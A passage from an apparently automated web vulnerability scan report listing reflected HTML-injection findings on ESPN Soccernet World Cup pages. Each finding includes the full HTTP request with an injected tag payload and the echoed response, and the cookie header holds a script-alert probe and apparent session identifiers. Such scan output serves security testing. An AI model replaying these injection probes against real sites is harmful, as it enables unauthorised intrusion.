HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:58 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:58 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN17 Cache-Expires: Sat, 06 Nov 2010 23:33:58 GMT Content-Length: 82316 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>South Africa Footba ...[SNIP]... <a href="/worldcup2010/team?team=467&_slug_=south-africa6f1e2"><a>30af7f0b19c&topId=792945&linktext=South+African+president+praises+side"> ...[SNIP]...
2.80. http://soccernet.espn.go.com/worldcup2010/team/_/team/467/south-africa [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/467/south-africa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c1ec"><a>0e9b1b1a4b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/467/south-africa?4c1ec"><a>0e9b1b1a4b5=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:27:13 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:27:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN33 Cache-Expires: Sat, 06 Nov 2010 23:32:12 GMT Content-Length: 82424 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>South Africa Footba ...[SNIP]... <a href="/worldcup2010/team?team=467&4c1ec"><a>0e9b1b1a4b5=1&_slug_=south-africa&4c1ec"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9049"><a>2c9ee8a6c83 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/468/slovakiac9049"><a>2c9ee8a6c83 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:25 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN16 Cache-Expires: Sat, 06 Nov 2010 23:33:25 GMT Content-Length: 81977 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Slovakia Football / ...[SNIP]... <a href="/worldcup2010/team?team=468&_slug_=slovakiac9049"><a>2c9ee8a6c83&topId=803490&linktext=Dutch+ease+to+2-1+win+against+Slovakia"> ...[SNIP]...
2.82. http://soccernet.espn.go.com/worldcup2010/team/_/team/468/slovakia [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/468/slovakia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c864f"><a>dc103401107 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/468/slovakia?c864f"><a>dc103401107=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:25:17 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:25:17 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN07 Cache-Expires: Sat, 06 Nov 2010 23:30:17 GMT Content-Length: 82085 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Slovakia Football / ...[SNIP]... <a href="/worldcup2010/team?team=468&c864f"><a>dc103401107=1&_slug_=slovakia&c864f"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69682"><a>ede52c78078 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/472/slovenia69682"><a>ede52c78078 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:12 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:12 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 23:33:12 GMT Content-Length: 81860 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Slovenia Football / ...[SNIP]... <a href="/worldcup2010/team?team=472&_slug_=slovenia69682"><a>ede52c78078&topId=801122&linktext=Slovenia+come+to+terms+with+exit"> ...[SNIP]...
2.84. http://soccernet.espn.go.com/worldcup2010/team/_/team/472/slovenia [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/472/slovenia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64674"><a>258595f7676 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/472/slovenia?64674"><a>258595f7676=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:25:20 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:25:20 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN21 Cache-Expires: Sat, 06 Nov 2010 23:30:19 GMT Content-Length: 81968 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Slovenia Football / ...[SNIP]... <a href="/worldcup2010/team?team=472&64674"><a>258595f7676=1&_slug_=slovenia&64674"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db0a"><a>888baac8773 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/475/switzerland4db0a"><a>888baac8773 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:58 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:58 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN31 Cache-Expires: Sat, 06 Nov 2010 23:33:58 GMT Content-Length: 82022 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Switzerland Footbal ...[SNIP]... <a href="/worldcup2010/team?team=475&_slug_=switzerland4db0a"><a>888baac8773&topId=802287&linktext=Hitzfeld+says+pressure+cost+Swiss"> ...[SNIP]...
2.86. http://soccernet.espn.go.com/worldcup2010/team/_/team/475/switzerland [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/475/switzerland
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f0d"><a>d5df743ea71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/475/switzerland?82f0d"><a>d5df743ea71=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:17 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:17 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN16 Cache-Expires: Sat, 06 Nov 2010 23:33:17 GMT Content-Length: 82130 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Switzerland Footbal ...[SNIP]... <a href="/worldcup2010/team?team=475&82f0d"><a>d5df743ea71=1&_slug_=switzerland&82f0d"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa8c8"><a>f460e0de5a0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/478/francefa8c8"><a>f460e0de5a0 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; 